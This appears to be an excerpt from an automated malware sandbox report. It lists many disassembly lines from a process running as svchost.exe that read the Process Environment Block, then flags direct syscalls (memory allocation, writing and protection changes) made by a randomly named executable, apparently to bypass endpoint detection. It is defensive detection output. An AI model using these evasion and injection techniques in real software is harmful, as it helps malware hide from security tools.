            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB106E mov eax, dword ptr fs:[00000030h]1_2_03AB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B05060 mov eax, dword ptr fs:[00000030h]1_2_03B05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov ecx, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41070 mov eax, dword ptr fs:[00000030h]1_2_03A41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C073 mov eax, dword ptr fs:[00000030h]1_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD070 mov ecx, dword ptr fs:[00000030h]1_2_03AAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32050 mov eax, dword ptr fs:[00000030h]1_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD705E mov ebx, dword ptr fs:[00000030h]1_2_03AD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD705E mov eax, dword ptr fs:[00000030h]1_2_03AD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B052 mov eax, dword ptr fs:[00000030h]1_2_03A5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB97A9 mov eax, dword ptr fs:[00000030h]1_2_03AB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABF7AF mov eax, dword ptr fs:[00000030h]1_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABF7AF mov eax, dword ptr fs:[00000030h]1_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABF7AF mov eax, dword ptr fs:[00000030h]1_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABF7AF mov eax, dword ptr fs:[00000030h]1_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABF7AF mov eax, dword ptr fs:[00000030h]1_2_03ABF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B037B6 mov eax, dword ptr fs:[00000030h]1_2_03B037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A307AF mov eax, dword ptr fs:[00000030h]1_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D7B0 mov eax, dword ptr fs:[00000030h]1_2_03A5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F7BA mov eax, dword ptr fs:[00000030h]1_2_03A2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF78A mov eax, dword ptr fs:[00000030h]1_2_03AEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3D7E0 mov ecx, dword ptr fs:[00000030h]1_2_03A3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]1_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]1_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A357C0 mov eax, dword ptr fs:[00000030h]1_2_03A357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A357C0 mov eax, dword ptr fs:[00000030h]1_2_03A357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A357C0 mov eax, dword ptr fs:[00000030h]1_2_03A357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB07C3 mov eax, dword ptr fs:[00000030h]1_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF72E mov eax, dword ptr fs:[00000030h]1_2_03AEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A33720 mov eax, dword ptr fs:[00000030h]1_2_03A33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4F720 mov eax, dword ptr fs:[00000030h]1_2_03A4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4F720 mov eax, dword ptr fs:[00000030h]1_2_03A4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4F720 mov eax, dword ptr fs:[00000030h]1_2_03A4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF972B mov eax, dword ptr fs:[00000030h]1_2_03AF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]1_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B73C mov eax, dword ptr fs:[00000030h]1_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B73C mov eax, dword ptr fs:[00000030h]1_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B73C mov eax, dword ptr fs:[00000030h]1_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B73C mov eax, dword ptr fs:[00000030h]1_2_03B0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29730 mov eax, dword ptr fs:[00000030h]1_2_03A29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29730 mov eax, dword ptr fs:[00000030h]1_2_03A29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A65734 mov eax, dword ptr fs:[00000030h]1_2_03A65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3973A mov eax, dword ptr fs:[00000030h]1_2_03A3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3973A mov eax, dword ptr fs:[00000030h]1_2_03A3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov ecx, dword ptr fs:[00000030h]1_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]1_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAC730 mov eax, dword ptr fs:[00000030h]1_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A37703 mov eax, dword ptr fs:[00000030h]1_2_03A37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A35702 mov eax, dword ptr fs:[00000030h]1_2_03A35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A35702 mov eax, dword ptr fs:[00000030h]1_2_03A35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C700 mov eax, dword ptr fs:[00000030h]1_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30710 mov eax, dword ptr fs:[00000030h]1_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60710 mov eax, dword ptr fs:[00000030h]1_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6F71F mov eax, dword ptr fs:[00000030h]1_2_03A6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6F71F mov eax, dword ptr fs:[00000030h]1_2_03A6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B765 mov eax, dword ptr fs:[00000030h]1_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B765 mov eax, dword ptr fs:[00000030h]1_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B765 mov eax, dword ptr fs:[00000030h]1_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B765 mov eax, dword ptr fs:[00000030h]1_2_03A2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A38770 mov eax, dword ptr fs:[00000030h]1_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]1_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A43740 mov eax, dword ptr fs:[00000030h]1_2_03A43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A43740 mov eax, dword ptr fs:[00000030h]1_2_03A43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A43740 mov eax, dword ptr fs:[00000030h]1_2_03A43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov esi, dword ptr fs:[00000030h]1_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]1_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30750 mov eax, dword ptr fs:[00000030h]1_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]1_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03749 mov eax, dword ptr fs:[00000030h]1_2_03B03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4755 mov eax, dword ptr fs:[00000030h]1_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D6AA mov eax, dword ptr fs:[00000030h]1_2_03A2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D6AA mov eax, dword ptr fs:[00000030h]1_2_03A2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A276B2 mov eax, dword ptr fs:[00000030h]1_2_03A276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A276B2 mov eax, dword ptr fs:[00000030h]1_2_03A276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A276B2 mov eax, dword ptr fs:[00000030h]1_2_03A276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A666B0 mov eax, dword ptr fs:[00000030h]1_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB368C mov eax, dword ptr fs:[00000030h]1_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB368C mov eax, dword ptr fs:[00000030h]1_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB368C mov eax, dword ptr fs:[00000030h]1_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB368C mov eax, dword ptr fs:[00000030h]1_2_03AB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]1_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC36EE mov eax, dword ptr fs:[00000030h]1_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC36EE mov eax, dword ptr fs:[00000030h]1_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC36EE mov eax, dword ptr fs:[00000030h]1_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC36EE mov eax, dword ptr fs:[00000030h]1_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC36EE mov eax, dword ptr fs:[00000030h]1_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC36EE mov eax, dword ptr fs:[00000030h]1_2_03AC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]1_2_03A5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]1_2_03A5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]1_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AED6F0 mov eax, dword ptr fs:[00000030h]1_2_03AED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]1_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]1_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]1_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]1_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]1_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]1_2_03A3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC mov eax, dword ptr fs:[00000030h]1_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC mov eax, dword ptr fs:[00000030h]1_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC mov eax, dword ptr fs:[00000030h]1_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC mov eax, dword ptr fs:[00000030h]1_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF6C7 mov eax, dword ptr fs:[00000030h]1_2_03AEF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A616CF mov eax, dword ptr fs:[00000030h]1_2_03A616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E627 mov eax, dword ptr fs:[00000030h]1_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F626 mov eax, dword ptr fs:[00000030h]1_2_03A2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A66620 mov eax, dword ptr fs:[00000030h]1_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B05636 mov eax, dword ptr fs:[00000030h]1_2_03B05636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A68620 mov eax, dword ptr fs:[00000030h]1_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3262C mov eax, dword ptr fs:[00000030h]1_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A61607 mov eax, dword ptr fs:[00000030h]1_2_03A61607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE609 mov eax, dword ptr fs:[00000030h]1_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6F603 mov eax, dword ptr fs:[00000030h]1_2_03A6F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]1_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A33616 mov eax, dword ptr fs:[00000030h]1_2_03A33616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A33616 mov eax, dword ptr fs:[00000030h]1_2_03A33616

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
